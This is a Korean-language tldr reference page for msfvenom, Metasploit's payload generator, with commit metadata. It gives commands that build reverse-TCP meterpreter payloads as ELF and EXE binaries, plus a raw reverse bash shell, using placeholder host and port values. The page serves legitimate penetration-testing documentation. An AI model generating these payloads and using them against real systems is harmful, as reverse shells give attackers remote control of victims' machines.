Files
tldr/pages.ko/common/msfvenom.md
코드싸이 feb91d75ea mpv: fix typo, common/m*: add and update Korean translation (#14664)
* common/m*: add and update Korean translation

* mpv: fix typo
2024-11-07 09:27:03 +09:00

29 lines
864 B
Markdown

# msfvenom
> Metasploit의 페이로드를 수동으로 생성.
> 더 많은 정보: <https://github.com/rapid7/metasploit-framework/wiki/How-to-use-msfvenom>.
- 페이로드 목록 표시:
`msfvenom -l payloads`
- 형식 목록 표시:
`msfvenom -l formats`
- 페이로드 옵션 표시:
`msfvenom -p {{페이로드}} --list-options`
- 역방향 TCP 핸들러로 ELF 바이너리 생성:
`msfvenom -p linux/x64/meterpreter/reverse_tcp LHOST={{로컬_IP}} LPORT={{로컬_포트}} -f elf -o {{경로/대상/바이너리}}`
- 역방향 TCP 핸들러로 EXE 바이너리 생성:
`msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST={{로컬_IP}} LPORT={{로컬_포트}} -f exe -o {{경로/대상/바이너리.exe}}`
- 역방향 TCP 핸들러로 원시 Bash 생성:
`msfvenom -p cmd/unix/reverse_bash LHOST={{로컬_IP}} LPORT={{로컬_포트}} -f raw`